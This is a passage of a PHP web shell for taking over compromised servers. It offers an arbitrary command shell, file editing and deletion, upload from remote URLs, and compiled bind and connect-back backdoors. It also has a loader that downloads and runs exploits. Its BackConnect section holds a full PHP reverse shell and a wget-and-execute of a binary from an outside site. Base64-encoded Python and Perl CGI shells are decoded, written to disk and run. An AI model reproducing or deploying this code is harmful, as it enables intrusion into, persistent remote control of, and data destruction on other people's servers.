  3548. while(!feof($filez))
  3549. {
  3550. $content .= htmlentities(str_replace("''","'",fgets($filez)));
  3551. }
  3552. @fclose($filez);
  3553. } ?>
  3554. <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
  3555. <table class="cmdbox">
  3556. <tr>
  3557. <td colspan="2">
  3558. <textarea class="output" name="content"><?php echo $content; ?></textarea>
  3559. </td>
  3560. <tr>
  3561. <td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
  3562. <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
  3563. &nbsp;<?php echo $msg; ?>
  3564. </td>
  3565. </tr>
  3566. </table>
  3567. </form>
  3568. <?php
  3569. }
  3570.  
  3571. elseif(isset($_GET['x']) && ($_GET['x'] == 'upload'))
  3572. {
  3573. if(isset($_POST['uploadcomp']))
  3574. {
  3575. if(is_uploaded_file($_FILES['file']['tmp_name']))
  3576. {
  3577. $path = magicboom($_POST['path']);
  3578. $fname = $_FILES['file']['name'];
  3579. $tmp_name = $_FILES['file']['tmp_name'];
  3580. $pindah = $path.$fname;
  3581. $stat = @move_uploaded_file($tmp_name,$pindah);
  3582. if ($stat) { $msg = "file uploaded to $pindah"; }
  3583. else $msg = "failed to upload $fname";
  3584. }
  3585. else $msg = "failed to upload $fname";
  3586. }
  3587. elseif(isset($_POST['uploadurl']))
  3588. {
  3589. $pilihan = trim($_POST['pilihan']);
  3590. $wurl = trim($_POST['wurl']);
  3591. $path = magicboom($_POST['path']);
  3592. $namafile = download($pilihan,$wurl);
  3593. $pindah = $path.$namafile;
  3594. if(is_file($pindah)) { $msg = "file uploaded to DIR $pindah"; }
  3595. else $msg = "failed ! to upload $namafile"; }
  3596. ?>
  3597. <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">
  3598. <table class="tabnet" style="width:320px;padding:0 1px;">
  3599. <tr>
  3600. <th colspan="2">Upload from computer</th>
  3601. </tr>
  3602. <tr>
  3603.  
  3604. <td colspan="2">
  3605. <p style="text-align:center;">
  3606. <input style="color:#7CDA89;" type="file" name="file" />
  3607. <input type="submit" name="uploadcomp" class="inputzbut" value="Go !" style="width:80px;">
  3608. </p>
  3609. </td>
  3610. </tr>
  3611. <tr>
  3612. <td colspan="2">
  3613. <input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" />
  3614. </td>
  3615. </tr>
  3616. </table>
  3617. </form>
  3618. <table class="tabnet" style="width:320px;padding:0 1px;">
  3619. <tr>
  3620. <th colspan="2">Upload from url</th>
  3621. </tr>
  3622. <tr>
  3623. <td colspan="2">
  3624. <form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">
  3625. <table>
  3626. <tr>
  3627. <td>url</td>
  3628. <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td>
  3629. </tr>
  3630. <tr>
  3631. <td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td>
  3632. </tr>
  3633. <tr>
  3634. <td>
  3635. <select size="1" class="inputz" name="pilihan">
  3636. <option value="wwget">wget</option>
  3637. <option value="wlynx">lynx</option>
  3638. <option value="wfread">fread</option>
  3639. <option value="wfetch">fetch</option>
  3640. <option value="wlinks">links</option>
  3641. <option value="wget">GET</option>
  3642. <option value="wcurl">curl</option>
  3643. </select>
  3644. </td>
  3645. <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go !" style="width:246px;"></td>
  3646. </tr>
  3647. </table>
  3648. </form>
  3649. </td>
  3650. </tr>
  3651. </table>
  3652. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  3653. <?php }
  3654.  
  3655. elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit'))
  3656. {
  3657. if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C'))
  3658. {
  3659. $port = trim($_POST['port']);
  3660. $passwrd = trim($_POST['bind_pass']);
  3661. tulis("bdc.c",$port_bind_bd_c);
  3662. exe("gcc -o bdc bdc.c");
  3663. exe("chmod 777 bdc");
  3664. @unlink("bdc.c");
  3665. exe("./bdc ".$port." ".$passwrd." &");
  3666. $scan = exe("ps aux");
  3667. if(eregi("./bdc $por",$scan))
  3668. {
  3669. $msg = "<p>Process found running, backdoor setup successfully.</p>";
  3670. }
  3671. else
  3672. {
  3673. $msg = "<p>Process not found running, backdoor not setup successfully.</p>";
  3674. }
  3675. }
  3676. elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl'))
  3677. {
  3678. $port = trim($_POST['port']);
  3679. $passwrd = trim($_POST['bind_pass']);
  3680. tulis("bdp",$port_bind_bd_pl);
  3681. exe("chmod 777 bdp");
  3682. $p2=which("perl");
  3683. exe($p2." bdp ".$port." &");
  3684. $scan = exe("ps aux");
  3685. if(eregi("$p2 bdp $port",$scan))
  3686. { $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
  3687. else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } }
  3688. elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C'))
  3689. {
  3690. $ip = trim($_POST['ip']);
  3691. $port = trim($_POST['backport']);
  3692. tulis("bcc.c",$back_connect_c);
  3693. exe("gcc -o bcc bcc.c");
  3694. exe("chmod 777 bcc");
  3695. @unlink("bcc.c");
  3696. exe("./bcc ".$ip." ".$port." &");
  3697. $msg = "Now script try connect to ".$ip." port ".$port." ...";
  3698. }
  3699. elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl'))
  3700. {
  3701. $ip = trim($_POST['ip']);
  3702. $port = trim($_POST['backport']);
  3703. tulis_2("bcp",$back_connect);
  3704. exe("chmod +x bcp");
  3705. $p2=which("perl");
  3706. exe($p2." bcp ".$ip." ".$port." &");
  3707. sleep(1);
  3708. $msg = "Now script try connect to ".$ip." port ".$port." ...";
  3709. unlink("bcp");
  3710. }
  3711. elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
  3712. {
  3713. $pilihan = trim($_POST['pilihan']);
  3714. $wurl = trim($_POST['wurl']);
  3715. $namafile = download($pilihan,$wurl);
  3716. if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; }
  3717. ?>
  3718. <table class="tabnet">
  3719. <tr>
  3720. <th>Port Binding</th>
  3721. <th>Connect Back</th>
  3722. <th>Load and Exploit</th>
  3723. </tr>
  3724. <tr>
  3725. <td>
  3726. <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  3727. <table>
  3728. <tr>
  3729. <td>Port</td>
  3730. <td>
  3731. <input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>">
  3732. </td>
  3733. </tr>
  3734. <tr>
  3735. <td>Password</td>
  3736. <td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td>
  3737. </tr>
  3738. <tr>
  3739. <td>Use</td>
  3740. <td style="text-align:justify">
  3741. <p>
  3742. <select class="inputz" size="1" name="use">
  3743. <option value="Perl">Perl</option>
  3744. <option value="C">C</option>
  3745. </select>
  3746. <input class="inputzbut" type="submit" name="bind" value="Bind !" style="width:120px">
  3747. </td>
  3748. </tr>
  3749. </table>
  3750. </form>
  3751. </td>
  3752. <td>
  3753. <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  3754. <table>
  3755. <tr>
  3756. <td>IP</td>
  3757. <td>
  3758. <input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>">
  3759. </td>
  3760. </tr>
  3761. <tr>
  3762. <td>Port</td>
  3763. <td>
  3764. <input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>">
  3765. </td>
  3766. </tr>
  3767. <tr>
  3768. <td>Use</td>
  3769. <td style="text-align:justify">
  3770. <p>
  3771. <select size="1" class="inputz" name="use">
  3772. <option value="Perl">Perl</option>
  3773. <option value="C">C</option>
  3774. </select>
  3775. <input type="submit" name="backconn" value="Connect !" class="inputzbut" style="width:120px">
  3776. </td>
  3777. </tr>
  3778. </table>
  3779. </form>
  3780. </td>
  3781. <td>
  3782. <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  3783. <table>
  3784. <tr>
  3785. <td>url</td>
  3786. <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td>
  3787. </tr>
  3788. <tr>
  3789. <td>cmd</td>
  3790. <td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
  3791. </tr>
  3792. <tr>
  3793. <td>
  3794. <select size="1" class="inputz" name="pilihan">
  3795. <option value="wwget">wget</option>
  3796. <option value="wlynx">lynx</option>
  3797. <option value="wfread">fread</option>
  3798. <option value="wfetch">fetch</option>
  3799. <option value="wlinks">links</option>
  3800. <option value="wget">GET</option>
  3801. <option value="wcurl">curl</option>
  3802. </select>
  3803. </td>
  3804. <td colspan="2">
  3805. <input type="submit" name="expcompile" class="inputzbut" value="Go !" style="width:246px;">
  3806. </td>
  3807. </tr>
  3808. </table>
  3809. </form>
  3810. </td>
  3811. </tr>
  3812. </table>
  3813. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  3814. <?php }
  3815.  
  3816. elseif(isset($_GET['x']) && ($_GET['x'] == 'shell'))
  3817. {
  3818. ?>
  3819. <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">
  3820. <table class="cmdbox">
  3821. <tr>
  3822. <td colspan="2">
  3823. <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
  3824. </td>
  3825. </tr>
  3826. <tr>
  3827. <td colspan="2"><?php echo $prompt; ?>
  3828. <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" />
  3829. <input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" />
  3830. </td>
  3831. </tr>
  3832. </table>
  3833. </form> <?php
  3834. }
  3835. else
  3836. {
  3837. if(isset($_GET['delete']) && ($_GET['delete'] != ""))
  3838. {
  3839. $file = $_GET['delete']; @unlink($file);
  3840. }
  3841. elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != ""))
  3842. {
  3843. @exe('rm -rf '.$_GET['fdelete'].'');
  3844. }
  3845. elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != ""))
  3846. {
  3847. $path = $pwd.$_GET['mkdir']; @mkdir($path);
  3848. }
  3849. $buff = showdir($pwd,$prompt);
  3850. echo $buff;
  3851. }
  3852. ?>
  3853.  
  3854. </div>
  3855. </font></font></span>
  3856.  
  3857.  
  3858.  
  3859. <?php
  3860.  
  3861. function printit ($string) {
  3862.  
  3863. if (!$daemon) {
  3864.  
  3865. print "$string\n";
  3866.  
  3867. }
  3868.  
  3869. }
  3870.  
  3871. $bc = $_GET["BackConnect"];
  3872.  
  3873. switch($bc){
  3874.  
  3875. case "PHP_1":
  3876.  
  3877.  
  3878.  
  3879. set_time_limit (0);
  3880.  
  3881. $VERSION = "1.0";
  3882.  
  3883. $ip = $_SERVER["REMOTE_ADDR"];
  3884.  
  3885. $port = 22;
  3886.  
  3887. $chunk_size = 1400;
  3888.  
  3889. $write_a = null;
  3890.  
  3891. $error_a = null;
  3892.  
  3893. $shell = 'uname -a; w; id; /bin/sh -i';
  3894.  
  3895. $daemon = 0;
  3896.  
  3897. $debug = 0;
  3898.  
  3899. if (function_exists('pcntl_fork')) {
  3900.  
  3901.  
  3902.  
  3903. $pid = pcntl_fork();
  3904.  
  3905.  
  3906.  
  3907. if ($pid == -1) {
  3908.  
  3909. printit("ERROR: Can't fork");
  3910.  
  3911. exit(1);
  3912.  
  3913. }
  3914.  
  3915.  
  3916.  
  3917. if ($pid) {
  3918.  
  3919. exit(0); // Parent exits
  3920.  
  3921. }
  3922.  
  3923. if (posix_setsid() == -1) {
  3924.  
  3925. printit("Error: Can't setsid()");
  3926.  
  3927. exit(1);
  3928.  
  3929. }
  3930.  
  3931.  
  3932.  
  3933. $daemon = 1;
  3934.  
  3935. } else {
  3936.  
  3937. print("WARNING: Failed to daemonise. This is quite common and not fatal.");
  3938.  
  3939. }
  3940.  
  3941.  
  3942.  
  3943. // Change to a safe directory
  3944.  
  3945. chdir("/");
  3946.  
  3947.  
  3948.  
  3949. // Remove any umask we inherited
  3950.  
  3951. umask(0);
  3952.  
  3953.  
  3954.  
  3955. //
  3956.  
  3957. // Do the reverse shell...
  3958.  
  3959. //
  3960.  
  3961.  
  3962.  
  3963. // Open reverse connection
  3964.  
  3965. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  3966.  
  3967. if (!$sock) {
  3968.  
  3969. printit("$errstr ($errno)");
  3970.  
  3971. exit(1);
  3972.  
  3973. }
  3974.  
  3975.  
  3976.  
  3977. // Spawn shell process
  3978.  
  3979. $descriptorspec = array(
  3980.  
  3981. 0 => array("pipe", "r"), // stdin is a pipe that the child will read from
  3982.  
  3983. 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
  3984.  
  3985. 2 => array("pipe", "w") // stderr is a pipe that the child will write to
  3986.  
  3987. );
  3988.  
  3989.  
  3990.  
  3991. $process = proc_open($shell, $descriptorspec, $pipes);
  3992.  
  3993.  
  3994.  
  3995. if (!is_resource($process)) {
  3996.  
  3997. printit("ERROR: Can't spawn shell");
  3998.  
  3999. exit(1);
  4000.  
  4001. }
  4002.  
  4003.  
  4004.  
  4005. // Set everything to non-blocking
  4006.  
  4007. // Reason: Occsionally reads will block, even though stream_select tells us they won't
  4008.  
  4009. stream_set_blocking($pipes[0], 0);
  4010.  
  4011. stream_set_blocking($pipes[1], 0);
  4012.  
  4013. stream_set_blocking($pipes[2], 0);
  4014.  
  4015. stream_set_blocking($sock, 0);
  4016.  
  4017.  
  4018.  
  4019. printit("Successfully opened reverse shell to $ip:$port");
  4020.  
  4021.  
  4022.  
  4023. while (1) {
  4024.  
  4025. // Check for end of TCP connection
  4026.  
  4027. if (feof($sock)) {
  4028.  
  4029. printit("ERROR: Shell connection terminated");
  4030.  
  4031. break;
  4032.  
  4033. }
  4034.  
  4035.  
  4036.  
  4037. // Check for end of STDOUT
  4038.  
  4039. if (feof($pipes[1])) {
  4040.  
  4041. printit("ERROR: Shell process terminated");
  4042.  
  4043. break;
  4044.  
  4045. }
  4046.  
  4047.  
  4048.  
  4049. // Wait until a command is end down $sock, or some
  4050.  
  4051. // command output is available on STDOUT or STDERR
  4052.  
  4053. $read_a = array($sock, $pipes[1], $pipes[2]);
  4054.  
  4055. $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  4056.  
  4057.  
  4058.  
  4059. // If we can read from the TCP socket, send
  4060.  
  4061. // data to process's STDIN
  4062.  
  4063. if (in_array($sock, $read_a)) {
  4064.  
  4065. if ($debug) printit("SOCK READ");
  4066.  
  4067. $input = fread($sock, $chunk_size);
  4068.  
  4069. if ($debug) printit("SOCK: $input");
  4070.  
  4071. fwrite($pipes[0], $input);
  4072.  
  4073. }
  4074.  
  4075.  
  4076.  
  4077. // If we can read from the process's STDOUT
  4078.  
  4079. // send data down tcp connection
  4080.  
  4081. if (in_array($pipes[1], $read_a)) {
  4082.  
  4083. if ($debug) printit("STDOUT READ");
  4084.  
  4085. $input = fread($pipes[1], $chunk_size);
  4086.  
  4087. if ($debug) printit("STDOUT: $input");
  4088.  
  4089. fwrite($sock, $input);
  4090.  
  4091. }
  4092.  
  4093.  
  4094.  
  4095. // If we can read from the process's STDERR
  4096.  
  4097. // send data down tcp connection
  4098.  
  4099. if (in_array($pipes[2], $read_a)) {
  4100.  
  4101. if ($debug) printit("STDERR READ");
  4102.  
  4103. $input = fread($pipes[2], $chunk_size);
  4104.  
  4105. if ($debug) printit("STDERR: $input");
  4106.  
  4107. fwrite($sock, $input);
  4108.  
  4109. }
  4110.  
  4111. }
  4112.  
  4113.  
  4114.  
  4115. fclose($sock);
  4116.  
  4117. fclose($pipes[0]);
  4118.  
  4119. fclose($pipes[1]);
  4120.  
  4121. fclose($pipes[2]);
  4122.  
  4123. proc_close($process);
  4124.  
  4125.  
  4126.  
  4127. // Like print, but does nothing if we've daemonised ourself
  4128.  
  4129. // (I can't figure out how to redirect STDOUT like a proper daemon)
  4130.  
  4131. break;
  4132.  
  4133. case "PHP_2":
  4134.  
  4135. $ipim=$_SERVER["REMOTE_ADDR"];
  4136.  
  4137. $portum="22";
  4138.  
  4139. if ($ipim <> "")
  4140.  
  4141. {
  4142.  
  4143. $mucx=fsockopen($ipim , $portum , $errno, $errstr );
  4144.  
  4145. if (!$mucx){
  4146.  
  4147. $result = "Error: didnt connect !!!";
  4148.  
  4149. }
  4150.  
  4151. else {
  4152.  
  4153.  
  4154.  
  4155. $zamazing0="\n";
  4156.  
  4157. fputs ($mucx ,"\nwelcome ZoRBaCK\n\n");
  4158.  
  4159. fputs($mucx , system("uname -a") .$zamazing0 );
  4160.  
  4161. fputs($mucx , system("pwd") .$zamazing0 );
  4162.  
  4163. fputs($mucx , system("id") .$zamazing0.$zamazing0 );
  4164.  
  4165. while(!feof($mucx)){
  4166.  
  4167. fputs ($mucx);
  4168.  
  4169. $one="[$";
  4170.  
  4171. $two="]";
  4172.  
  4173. $result= fgets ($mucx, 8192);
  4174.  
  4175. $message=`$result`;
  4176.  
  4177. fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n");
  4178.  
  4179. }
  4180.  
  4181. fclose ($mucx);
  4182.  
  4183. }
  4184.  
  4185. }
  4186.  
  4187.  
  4188.  
  4189. break;
  4190.  
  4191. case "PHP_3":
  4192.  
  4193. $fipn=$_SERVER["REMOTE_ADDR"];
  4194.  
  4195. $bportn="22";
  4196.  
  4197. if ($fipn <> "")
  4198.  
  4199. {
  4200.  
  4201. $fp=fsockopen($fipn , $bportn , $errno, $errstr);
  4202.  
  4203. if (!$fp){
  4204.  
  4205. $result = "Error: could not open socket connection";
  4206.  
  4207. }
  4208.  
  4209. else {
  4210.  
  4211. fputs ($fp ,"\n
  4212.  
  4213. whoami
  4214.  
  4215. root
  4216.  
  4217. :)\n\n");
  4218.  
  4219. while(!feof($fp)){
  4220.  
  4221. fputs ($fp);
  4222.  
  4223. $result= fgets ($fp, 4096);
  4224.  
  4225. $message=`$result`;
  4226.  
  4227. fputs ($fp,"--> ".$message."\n");
  4228.  
  4229. }
  4230.  
  4231. fclose ($fp);
  4232.  
  4233. }
  4234.  
  4235. }
  4236.  
  4237. break;
  4238.  
  4239. case "PHP_4":
  4240.  
  4241. #!/usr/bin/perl
  4242.  
  4243. # coded by izo
  4244.  
  4245. {
  4246.  
  4247. print "root by izo\n";
  4248.  
  4249. $fip=$_SERVER["REMOTE_ADDR"];
  4250.  
  4251. $bport="22";
  4252.  
  4253. system("wget http://paradiseinpuntagorda.com/images/dc");
  4254.  
  4255. system("chmod 777 dc");
  4256.  
  4257. system("./dc $fip $bport");
  4258.  
  4259. }
  4260.  
  4261. break;
  4262.  
  4263. case "PHP_5":
  4264.  
  4265. # coded by izo
  4266.  
  4267. {
  4268.  
  4269. print "Ba&#287;lan&#305;l&#305;yor...\n";
  4270.  
  4271. $fipc=$_SERVER["REMOTE_ADDR"];
  4272.  
  4273. $bportc="22";
  4274.  
  4275. $izoemmi = 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCiMjIyMjIyMjIyMjIyMjIyMjIyMjIwojLS0tLS0tLS0tLS0t
  4276.  
  4277. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0rCiMgICAgICAgICAgICAgICAgICAg
  4278.  
  4279. ICAgLl9fX19fX19fX19fX19fX19fX19fXy4gIHwKIyAgIGNvZGVkIGJ5IHNsYXYwbmljICB8IHNs
  4280.  
  4281. YXYwbmljMEBnbWFpbC5jb20gfCAgfCAgICAKIyAgICAgICAgICAgICAgICAgICAgICBeLS0tLS0t
  4282.  
  4283. LS0tLS0tLS0tLS0tLS0tXiAgfAojIHNpdGU6IHNsYXYwbmljLnhzcy5ydSAgICAgICAgICAgICAg
  4284.  
  4285. ICAgICAgICAgICB8CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4286.  
  4287. LS0tLSsKI2ZvciBzZXR1cCBhIGxpc3RlbmluZyBwb3J0IG9uIHlvdXIgaG9zdDogbmMgLWwgLXAg
  4288.  
  4289. W3BvcnRdIAojVXNlOiBweXRob24gc2xfYmMucHkgW2hvc3RdIFtwb3J0XSB8fCBzbF9iYy5weSAt
  4290.  
  4291. ZGVmYXVsdCBzZXR0aW5ncwoKZnJvbSBzb2NrZXQgaW1wb3J0ICoKaW1wb3J0IG9zCmltcG9ydCBt
  4292.  
  4293. ZDUKaW1wb3J0IHN5cwoKIyMjIyMjIyMjIyNfRGVmYXVsdF8jIyMjIyMjIyMjIyMjIyMjIyMjIyMj
  4294.  
  4295. IyMKaG9zdD0nbG9jYWxob3N0JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAjCnBvcnQ9NjY2
  4296.  
  4297. NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIwphdXRvY29tbWFuZHM9InVuc2V0
  4298.  
  4299. IEhJU1RGSUxFO3VuYW1lIC1hO2lkIiAgICMKIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
  4300.  
  4301. IyMjIyMjIyMjIyMjIyMKaWYgbGVuKHN5cy5hcmd2KT4xOgogICAgaG9zdD1zeXMuYXJndlsxXQog
  4302.  
  4303. ICAgaWYgbGVuKHN5cy5hcmd2KT4yOgogICAgICAgIHBvcnQ9aW50KHN5cy5hcmd2WzJdKQpwcmlu
  4304.  
  4305. dCAiWytdaG9zdDpwb3J0PSAlczolaSIlKGhvc3QscG9ydCkKICAgICAgICAKaW5mbz1vcy5wb3Bl
  4306.  
  4307. bihhdXRvY29tbWFuZHMpLnJlYWQoKQp0cnk6CiAgICBzb2Nrb2JqPXNvY2tldChBRl9JTkVULFNP
  4308.  
  4309. Q0tfU1RSRUFNKQogICAgc29ja29iai5jb25uZWN0KChob3N0LHBvcnQpKQpleGNlcHQ6CiAgICBw
  4310.  
  4311. cmludCAnWy1dU29ja2V0RXJyb3InLHN5cy5leGNfdmFsdWUKICAgIHN5cy5leGl0KDEpCnNvY2tv
  4312.  
  4313. Ymouc2VuZCgiLjpiaW5ic2hlbGw6LlxuICVzIiVpbmZvKQpvcy5kdXAyKHNvY2tvYmouZmlsZW5v
  4314.  
  4315. KCksMikKb3MuZHVwMihzb2Nrb2JqLmZpbGVubygpLDEpCm9zLmR1cDIoc29ja29iai5maWxlbm8o
  4316.  
  4317. KSwwKQpvcy5leGVjbCgiL2Jpbi9zaCIsInNoIik=';
  4318.  
  4319. $file = fopen("conp" ,"w+");
  4320.  
  4321. $write = fwrite ($file ,base64_decode($izoemmi));
  4322.  
  4323. fclose($file);
  4324.  
  4325. chmod("conp" , 0777);
  4326.  
  4327. system("./conp $fipc $bportc");
  4328.  
  4329. }
  4330.  
  4331. break;
  4332.  
  4333. case "PHP_6":
  4334.  
  4335. mkdir('cgitelnet1', 0755);
  4336.  
  4337. chdir('cgitelnet1');
  4338.  
  4339. $kokdosya = ".htaccess";
  4340.  
  4341. $dosya_adi = "$kokdosya";
  4342.  
  4343. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  4344.  
  4345. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  4346.  
  4347.  
  4348.  
  4349. AddType application/x-httpd-cgi .cin
  4350.  
  4351.  
  4352.  
  4353. AddHandler cgi-script .cin
  4354.  
  4355. AddHandler cgi-script .cin";
  4356.  
  4357. fwrite ( $dosya , $metin ) ;
  4358.  
  4359. fclose ($dosya);
  4360.  
  4361. $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0t
  4362.  
  4363. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4364.  
  4365. LS0tLQ0KIyA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5w
  4366.  
  4367. cml2OCBjZ2kgc2hlbGw8L2I+ICMgc2VydmVyDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4368.  
  4369. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiMt
  4370.  
  4371. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4372.  
  4373. LS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQ29uZmlndXJhdGlvbjogWW91IG5lZWQgdG8gY2hhbmdl
  4374.  
  4375. IG9ubHkgJFBhc3N3b3JkIGFuZCAkV2luTlQuIFRoZSBvdGhlcg0KIyB2YWx1ZXMgc2hvdWxkIHdv
  4376.  
  4377. cmsgZmluZSBmb3IgbW9zdCBzeXN0ZW1zLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4378.  
  4379. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KJFBhc3N3
  4380.  
  4381. b3JkID0gInByaXY4IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhp
  4382.  
  4383. cw0KCQkJCSMgdG8gbG9naW4uDQoNCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2Ug
  4384.  
  4385. dGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZg0KCQkJCSMgeW91J3JlIHJ1bm5pbmcgdGhpcyBzY3Jp
  4386.  
  4387. cHQgb24gYSBXaW5kb3dzIE5UDQoJCQkJIyBtYWNoaW5lLiBJZiB5b3UncmUgcnVubmluZyBpdCBv
  4388.  
  4389. biBVbml4LCB5b3UNCgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuDQoNCiROVENt
  4390.  
  4391. ZFNlcCA9ICImIjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1h
  4392.  
  4393. bmRzDQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULg0KDQokVW5peENtZFNl
  4394.  
  4395. cCA9ICI7IjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1hbmRz
  4396.  
  4397. DQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4Lg0KDQokQ29tbWFuZFRpbWVvdXREdXJh
  4398.  
  4399. dGlvbiA9IDEwOwkjIFRpbWUgaW4gc2Vjb25kcyBhZnRlciBjb21tYW5kcyB3aWxsIGJlIGtpbGxl
  4400.  
  4401. ZA0KCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzDQoJ
  4402.  
  4403. CQkJIyB1c2VmdWwgZm9yIGNvbW1hbmRzIHRoYXQgbWF5IGhhbmcgb3IgdGhhdA0KCQkJCSMgdGFr
  4404.  
  4405. ZSB2ZXJ5IGxvbmcgdG8gZXhlY3V0ZSwgbGlrZSAiZmluZCAvIi4NCgkJCQkjIFRoaXMgaXMgdmFs
  4406.  
  4407. aWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzDQoJCQkJIyBpZ25vcmVkIG9uIE5UIFNlcnZl
  4408.  
  4409. cnMuDQoNCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRh
  4410.  
  4411. IGlzIHNlbnQgdG8gdGhlDQoJCQkJIyBicm93c2VyIGFzIHNvb24gYXMgaXQgaXMgb3V0cHV0LCBv
  4412.  
  4413. dGhlcndpc2UNCgkJCQkjIGl0IGlzIGJ1ZmZlcmVkIGFuZCBzZW5kIHdoZW4gdGhlIGNvbW1hbmQN
  4414.  
  4415. CgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UNCgkJCQkj
  4416.  
  4417. IHBpbmcsIHNvIHRoYXQgeW91IGNhbiBzZWUgdGhlIG91dHB1dCBhcyBpdA0KCQkJCSMgaXMgYmVp
  4418.  
  4419. bmcgZ2VuZXJhdGVkLg0KDQojIERPTidUIENIQU5HRSBBTllUSElORyBCRUxPVyBUSElTIExJTkUg
  4420.  
  4421. VU5MRVNTIFlPVSBLTk9XIFdIQVQgWU9VJ1JFIERPSU5HICEhDQoNCiRDbWRTZXAgPSAoJFdpbk5U
  4422.  
  4423. ID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOw0KJENtZFB3ZCA9ICgkV2luTlQgPyAiY2QiIDog
  4424.  
